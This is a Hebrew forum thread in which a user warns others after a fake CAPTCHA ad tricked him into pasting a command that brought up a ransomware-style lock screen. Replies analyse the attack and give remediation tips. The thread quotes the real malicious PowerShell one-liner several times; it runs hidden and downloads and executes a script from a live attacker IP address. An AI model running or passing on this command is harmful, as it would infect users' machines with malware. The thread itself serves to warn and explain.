שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
-
אשמח אם תוכל לשלוח לי (אפשר בפרטי) את האתר שממנו הפרסומת נשלחה, אני רוצה לבדוק את זה, זה תחום שמעניין אותי
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
(תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)
-
@אשריך-עליך היה ספירה לאחור עד שהמחשב אמור להחסם, של שעה וחצי. או תשלום, ואז לא יקרה כלום.
לא היה לי כח לחכות שעה וחצי עד אז.
ועדיין לא פתחתי את המחשב הזה, אולי בהמשך אני יעדכן מה איתו.@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
היה ספירה לאחור עד שהמחשב אמור להחסם, של שעה וחצי. או תשלום, ואז לא יקרה כלום.
לא היה לי כח לחכות שעה וחצי עד אז.
ועדיין לא פתחתי את המחשב הזה, אולי בהמשך אני יעדכן מה איתו.למה לחכות? זה מעניין משהו? צריך לכבות את המחשב תיכף ומיד! ואח"כ לנסות לשחזר הכל דרך דיסק טכנאים.
על מחשב כבוי הגנבים לא יכולים לעשות כלום.. -
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
היה ספירה לאחור עד שהמחשב אמור להחסם, של שעה וחצי. או תשלום, ואז לא יקרה כלום.
לא היה לי כח לחכות שעה וחצי עד אז.
ועדיין לא פתחתי את המחשב הזה, אולי בהמשך אני יעדכן מה איתו.למה לחכות? זה מעניין משהו? צריך לכבות את המחשב תיכף ומיד! ואח"כ לנסות לשחזר הכל דרך דיסק טכנאים.
על מחשב כבוי הגנבים לא יכולים לעשות כלום.. -
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
(תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
תפענחו מה עשה בדיוק הפקודה
תשובה מגרוק:
Clop (ידוע גם כ-Cl0p) הוא וירוס כופר שידוע בשימוש בפקודות PowerShell מעורפלות להורדה והרצה של מטענים זדוניים, כולל סקריפטים שמורדים מקבצים כמו txt. הפקודה שציינת דומה לדפוסים בשימוש על ידי Clop, שבהם PowerShell משמש להורדת תוכן מקישורים חיצוניים (למשל, באמצעות Invoke-WebRequest או אליאסים כמו wget) והרצתו, לעיתים עם ערפול כדי להימנע מגילוי.
מה הווירוס עושה (ברמה גבוהה):כניסה למערכת: מתפשט דרך פרצות אבטחה (כמו CVE-2023-34362 ב-MOVEit או פרצות אחרות), דוא"ל פישינג עם קבצים זדוניים, או גישה מרחוק דרך RDP עם אישורים גנובים.
הרצה ראשונית: משתמש בכלים כמו Get2 loader או SDBot כדי להוריד רכיבים נוספים. PowerShell משמש להרצת סקריפטים שמבצעים סריקה, העלאת הרשאות, והתקנת backdoors.
סריקה ותנועה רוחבית: סורק את הרשת אחר קבצים, תהליכים ומכשירים מחוברים. משתמש בכלים כמו Cobalt Strike או PowerShell כדי להתפשט למכשירים אחרים ברשת, כולל שרתי Active Directory.
הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
גניבת נתונים: בגרסאות מתקדמות, גונב נתונים רגישים ומאיים לפרסם אותם אם לא משלמים (שיטת double-extortion).
מחיקת עקבות: מוחק עותקי גיבוי (כמו shadow copies), סוגר תהליכי אבטחה, ומנקה יומנים כדי למנוע שחזור.
דרישת כופר: משאיר קובץ ransom note (כמו ClopReadMe.txt) עם הוראות תשלום בביטקוין או מטבעות קריפטו אחרים, בדרך כלל בסכומים גבוהים.
השפעה נוספת: יכול להשבית תוכנות אבטחה, לשנות הגדרות מערכת, וליצור שירותים כדי להישאר persistent. -
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
תפענחו מה עשה בדיוק הפקודה
תשובה מגרוק:
Clop (ידוע גם כ-Cl0p) הוא וירוס כופר שידוע בשימוש בפקודות PowerShell מעורפלות להורדה והרצה של מטענים זדוניים, כולל סקריפטים שמורדים מקבצים כמו txt. הפקודה שציינת דומה לדפוסים בשימוש על ידי Clop, שבהם PowerShell משמש להורדת תוכן מקישורים חיצוניים (למשל, באמצעות Invoke-WebRequest או אליאסים כמו wget) והרצתו, לעיתים עם ערפול כדי להימנע מגילוי.
מה הווירוס עושה (ברמה גבוהה):כניסה למערכת: מתפשט דרך פרצות אבטחה (כמו CVE-2023-34362 ב-MOVEit או פרצות אחרות), דוא"ל פישינג עם קבצים זדוניים, או גישה מרחוק דרך RDP עם אישורים גנובים.
הרצה ראשונית: משתמש בכלים כמו Get2 loader או SDBot כדי להוריד רכיבים נוספים. PowerShell משמש להרצת סקריפטים שמבצעים סריקה, העלאת הרשאות, והתקנת backdoors.
סריקה ותנועה רוחבית: סורק את הרשת אחר קבצים, תהליכים ומכשירים מחוברים. משתמש בכלים כמו Cobalt Strike או PowerShell כדי להתפשט למכשירים אחרים ברשת, כולל שרתי Active Directory.
הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
גניבת נתונים: בגרסאות מתקדמות, גונב נתונים רגישים ומאיים לפרסם אותם אם לא משלמים (שיטת double-extortion).
מחיקת עקבות: מוחק עותקי גיבוי (כמו shadow copies), סוגר תהליכי אבטחה, ומנקה יומנים כדי למנוע שחזור.
דרישת כופר: משאיר קובץ ransom note (כמו ClopReadMe.txt) עם הוראות תשלום בביטקוין או מטבעות קריפטו אחרים, בדרך כלל בסכומים גבוהים.
השפעה נוספת: יכול להשבית תוכנות אבטחה, לשנות הגדרות מערכת, וליצור שירותים כדי להישאר persistent.@א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
הוא אשר דברנו..
על ידי כיבוי המחשב תיכף ומיד אפשר למנוע את זה. -
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
תפענחו מה עשה בדיוק הפקודה
תשובה מגרוק:
Clop (ידוע גם כ-Cl0p) הוא וירוס כופר שידוע בשימוש בפקודות PowerShell מעורפלות להורדה והרצה של מטענים זדוניים, כולל סקריפטים שמורדים מקבצים כמו txt. הפקודה שציינת דומה לדפוסים בשימוש על ידי Clop, שבהם PowerShell משמש להורדת תוכן מקישורים חיצוניים (למשל, באמצעות Invoke-WebRequest או אליאסים כמו wget) והרצתו, לעיתים עם ערפול כדי להימנע מגילוי.
מה הווירוס עושה (ברמה גבוהה):כניסה למערכת: מתפשט דרך פרצות אבטחה (כמו CVE-2023-34362 ב-MOVEit או פרצות אחרות), דוא"ל פישינג עם קבצים זדוניים, או גישה מרחוק דרך RDP עם אישורים גנובים.
הרצה ראשונית: משתמש בכלים כמו Get2 loader או SDBot כדי להוריד רכיבים נוספים. PowerShell משמש להרצת סקריפטים שמבצעים סריקה, העלאת הרשאות, והתקנת backdoors.
סריקה ותנועה רוחבית: סורק את הרשת אחר קבצים, תהליכים ומכשירים מחוברים. משתמש בכלים כמו Cobalt Strike או PowerShell כדי להתפשט למכשירים אחרים ברשת, כולל שרתי Active Directory.
הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
גניבת נתונים: בגרסאות מתקדמות, גונב נתונים רגישים ומאיים לפרסם אותם אם לא משלמים (שיטת double-extortion).
מחיקת עקבות: מוחק עותקי גיבוי (כמו shadow copies), סוגר תהליכי אבטחה, ומנקה יומנים כדי למנוע שחזור.
דרישת כופר: משאיר קובץ ransom note (כמו ClopReadMe.txt) עם הוראות תשלום בביטקוין או מטבעות קריפטו אחרים, בדרך כלל בסכומים גבוהים.
השפעה נוספת: יכול להשבית תוכנות אבטחה, לשנות הגדרות מערכת, וליצור שירותים כדי להישאר persistent.@א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
תשובה מגרוק
🫨 שנשמע ונתבשר בשורות טובות.
העיקר שלבנתיים לא נגעו בחשבון בנק שלי
. (אני ישנה סיסמה) -
@א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
תשובה מגרוק
🫨 שנשמע ונתבשר בשורות טובות.
העיקר שלבנתיים לא נגעו בחשבון בנק שלי. (אני ישנה סיסמה) -
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
(תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)
-
@א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
תשובה מגרוק
🫨 שנשמע ונתבשר בשורות טובות.
העיקר שלבנתיים לא נגעו בחשבון בנק שלי. (אני ישנה סיסמה) -
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
@יונימדיה משתתף בצערך
-
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
@מד לכאורה מספיק גם ניתוק האינטרנט.
זה מה שעשיתי.יש כרגע וירוס במחשב שלך ש(אולי) מצפין את הקבצים - אם לא גמר להצפין כבר, אבל לא שווה לקחת את הסיכון אולי הוא עדיין באמצע
תכבה מיד -
ניתוח טכני של הפקודה
powershell -wi mi: זהו קיצור מוסווה של הפקודה WindowStyle Hidden. המטרה היא לגרום לחלון ה-PowerShell שייפתח להיעלם מיד מהעין של המשתמש, כדי שהוא לא יבין שרצה תוכנה ברקע.wget (או Invoke-WebRequest): הפקודה פונה לכתובת ה-IP המופיעה שם (84.21.189.170) ומנסה להוריד קובץ בשם clo.txt.
למרות שהסיומת היא .txt, זהו למעשה סקריפט של PowerShell שמכיל את הקוד הזדוני האמיתי
I am not a bot - Verification ID: #8620: זהו "רעש" שהתוקפים הוסיפו. ה-PowerShell מתעלם מהטקסט הזה כי הוא לא פקודה חוקית, אבל הוא נועד להטעות את המשתמש שמעתיק את הקוד, כדי שיחשוב שזה באמת חלק מתהליך אימות (CAPTCHA).
-
@יונימדיה להגיע לחשבון בנק זה פי 20 יותר קשה מלפרוץ סתם למחשב שלך כי זה מאובטח אצל גוגל ברמה גבוהה
-
@yehokarpel ממש לא ברמה גבוהה. הסיסמאות במנהל הסיסמאות של כרום לא מגובבות. ממש לא כדאי להשתמש בו.
כדאי בKeepassXC.
@מישהו12 הרעיון הוא שבבנק יש גם מזהה שלא שמור בכרום וגם מסתבר שהאתר שלהם יותר רגיש לתנועות חשודות - לא מסיר סיכון אבל כן מוריד אותו קצת
צריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com
-
@מישהו12 הרעיון הוא שבבנק יש גם מזהה שלא שמור בכרום וגם מסתבר שהאתר שלהם יותר רגיש לתנועות חשודות - לא מסיר סיכון אבל כן מוריד אותו קצת
@מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.
(כמובן הכול בהנחה של התקפה חד פעמית)
עריכה: דפדפנים כמו https://octobrowser.net/
די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם
-
@מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.
(כמובן הכול בהנחה של התקפה חד פעמית)
עריכה: דפדפנים כמו https://octobrowser.net/
די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}